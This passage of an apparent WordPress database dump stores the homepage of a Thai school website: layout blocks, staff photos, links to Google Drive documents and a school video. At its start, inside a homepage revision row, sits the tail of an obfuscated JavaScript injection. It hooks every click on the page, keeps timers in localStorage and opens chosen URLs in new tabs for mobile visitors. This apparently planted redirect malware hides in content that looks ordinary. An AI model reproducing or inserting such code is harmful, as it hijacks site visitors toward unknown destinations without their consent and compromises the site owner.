_0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-06 16:00:55','2024-09-06 09:00:55','',19,'http://watprato.ssk.in.th/?p=361',0,'revision','',0),
(362,2,'2024-09-09 16:37:49','2024-09-09 09:37:49','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a 